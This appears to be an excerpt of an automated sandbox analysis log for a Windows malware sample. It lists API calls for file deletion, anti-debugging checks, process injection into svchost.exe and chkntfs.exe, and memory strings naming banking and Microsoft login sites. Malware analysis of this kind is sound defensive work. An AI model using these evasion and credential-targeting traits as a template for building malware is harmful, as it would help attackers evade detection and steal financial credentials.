                Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C8D076
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C5C2A2 FindFirstFileExW,0_2_00C5C2A2
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C8D3A9
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C99642
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C9979D
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C968EE FindFirstFileW,FindClose,0_2_00C968EE
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C9698F
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C8DBBE
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C99B2B
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C95C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C95C97
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0249CFA0 FindFirstFileW,FindNextFileW,FindClose,6_2_0249CFA0
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C242DE
                Source: 721e5H878.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 721e5H878.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 721e5H878.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 721e5H878.6.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 721e5H878.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11g
                Source: chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ropeVMware20,116
                Source: chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,
                Source: 721e5H878.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 721e5H878.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,1
                Source: 721e5H878.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 721e5H878.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 721e5H878.6.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 721e5H878.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: 721e5H878.6.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: firefox.exe, 00000009.00000002.2890895632.0000023D9254C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 721e5H878.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 721e5H878.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 721e5H878.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /profileVMware20
                Source: 721e5H878.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 721e5H878.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 721e5H878.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20
                Source: OtAlYRopPg.exe, 00000007.00000002.4618897911.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
                Source: 721e5H878.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 721e5H878.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 721e5H878.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 721e5H878.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 721e5H878.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 721e5H878.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 721e5H878.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 721e5H878.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 1162-201.exe, 00000000.00000002.2172061482.0000000000F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A1KvmCiZKdUEI0cVW@6
                Source: 721e5H878.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 721e5H878.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 721e5H878.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 721e5H878.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 721e5H878.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418153 LdrLoadDll,2_2_00418153
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C52622
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C242DE
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C44CE8 mov eax, dword ptr fs:[00000030h]0_2_00C44CE8
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_0314D050 mov eax, dword ptr fs:[00000030h]0_2_0314D050
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_0314D0B0 mov eax, dword ptr fs:[00000030h]0_2_0314D0B0
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_0314BA20 mov eax, dword ptr fs:[00000030h]0_2_0314BA20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov ecx, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]2_2_03250310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]2_2_032D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]2_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]2_2_032D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330634F mov eax, dword ptr fs:[00000030h]2_2_0330634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]2_2_032663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]2_2_032EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]2_2_032B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]2_2_0322823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]2_2_0322826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]2_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]2_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330625D mov eax, dword ptr fs:[00000030h]2_2_0330625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]2_2_0322A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]2_2_03236259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033062D6 mov eax, dword ptr fs:[00000030h]2_2_033062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]2_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]2_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
